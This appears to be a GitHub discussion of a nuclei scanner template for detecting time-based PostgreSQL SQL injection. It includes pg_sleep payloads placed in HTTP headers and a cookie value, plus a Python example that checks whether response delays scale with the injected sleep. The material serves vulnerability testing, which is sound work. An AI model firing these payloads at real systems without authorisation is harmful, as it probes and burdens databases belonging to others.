Test nuclei http headers #8027
Hello community, I was wondering: could it be that the nuclei templates are testing the HTTP Cookie headers for a SQL injection vulnerability? Example (I tried it and it didn't work):

```yaml
requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      User-Agent: "' x'||pg_sleep(20)--'"
      Content-Length: "' x'||pg_sleep(15)--'"
      Cookie: "'x'||pg_sleep(10)--'"
    matchers:
      - type: dsl
        dsl:
          - 'duration>=10'
          - 'duration>=15'
          - 'duration>=20'
```
Replies: 1 comment
Hello @0xc4sper0,

We advise against relying solely on the duration DSL, as it can vary due to network issues. Therefore, we recommend adding additional matchers for better detection while running on a large dataset of hosts.

In the above example, it is mentioned that the TrackingId cookie is vulnerable to SQLi. To test this vulnerability, you need to inject the cookie value instead of modifying the cookie header directly. For example:

```
TrackingId=x'||pg_sleep(10)--
```
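The two points in the reply above, as an added example that is not part of the original thread or of the nuclei project: the payload goes in the cookie value, and a finding is accepted only when the extra latency tracks the injected sleep instead of a single `duration>=10` check. The function names, the 1.5 s tolerance and the timing samples are assumptions constructed for illustration; the code makes no network requests.

```python
import statistics

# Payload shape copied from the reply above; only the sleep value varies.
PAYLOAD = "x'||pg_sleep({delay})--"


def cookie_header(name, delay):
    """Build the header with the payload as the cookie *value* (name=value)."""
    return {"Cookie": f"{name}={PAYLOAD.format(delay=delay)}"}


def naive_match(durations, threshold=10):
    """Equivalent of a lone 'duration>=10' matcher."""
    return any(d >= threshold for d in durations)


def delay_confirmed(baseline, probes, tolerance=1.5):
    """True only if the added latency tracks each injected sleep value.

    baseline: durations (s) of requests with a harmless cookie value.
    probes:   {injected_sleep_seconds: [observed durations (s)]}.
    """
    if len(probes) < 2:
        return False  # one delay value cannot separate a sleep from a slow host
    base = statistics.median(baseline)
    for delay, observed in probes.items():
        extra = statistics.median(observed) - base
        if abs(extra - delay) > tolerance:
            return False
    return True


# Constructed timing samples (seconds), not measurements from a real host.
VULNERABLE = {"baseline": [0.21, 0.25, 0.23],
              "probes": {5: [5.2, 5.3], 10: [10.2, 10.4]}}
SLOW_HOST = {"baseline": [11.8, 12.4, 12.1],
             "probes": {5: [12.0, 12.3], 10: [11.9, 12.2]}}

if __name__ == "__main__":
    print(cookie_header("TrackingId", 10))
    for label, s in (("vulnerable", VULNERABLE), ("slow host", SLOW_HOST)):
        all_probe_times = [d for obs in s["probes"].values() for d in obs]
        print(label, naive_match(all_probe_times), delay_confirmed(**s))
```

The slow-host sample trips the lone duration threshold but fails the scaled check, which is the false positive the reply warns about on large host sets.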